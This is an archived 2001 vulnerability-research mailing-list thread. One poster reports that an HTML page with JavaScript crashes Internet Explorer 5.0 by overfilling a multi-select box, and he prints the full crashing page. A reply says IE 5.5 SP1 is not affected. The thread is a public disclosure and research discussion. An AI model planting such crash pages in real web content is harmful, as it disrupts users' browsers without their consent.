Vulnerability Development mailing list archives

RE: IE 5.0 vulnerability


From: "Uidam, T (Tim)" <Tim.Uidam () SYD RABOBANK COM>
Date: Wed, 23 May 2001 07:06:35 +0800

Seems IE 5.5 SP1 (v5.5.4522.1800) on WinNT4 SP5 is not susceptible...

Regards,
Tim.

-----Original Message-----
From: Thomas Magnum [mailto:dr_oo_py () hotmail com]
Sent: Wednesday, 23 May 2001 1:44
To: VULN-DEV () securityfocus com
Subject: I: IE 5.0 vulnerability


I found a vulnerability in IE 5.0; I don't know if it was already
discovered (if so, forget this). It seems that the problem is JavaScript.
I don't know if it is exploitable, but if I try to open an HTML file like
this:

<script>
function crashme() {
 var i, opt;
 for(i = 0; i < 7; i++) {
  opt = new Option('crashing...', i);
  document.vulnForm.p_select.options[i] = opt;
  document.vulnForm.p_select.options[i].selected = true;
 }
}
</script>

<html>
<head>
<title>IE 5.0 Vulnerability</title>
</head>
<body>
<form name="vulnForm">
  <table width="100%" border="0">
    <tr>
      <td align="center">
          <select name="p_select" size="5" multiple>
            <option>__________________</option>
          </select>
      </td>
    </tr>
    <tr>
      <td align="center">
          <input type="button" name="cmd" value="go!" onClick="crashme()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

I get the classical Winxx error...

I noticed that IE crashes when I try to put at least 3 items more than
its size into the select.


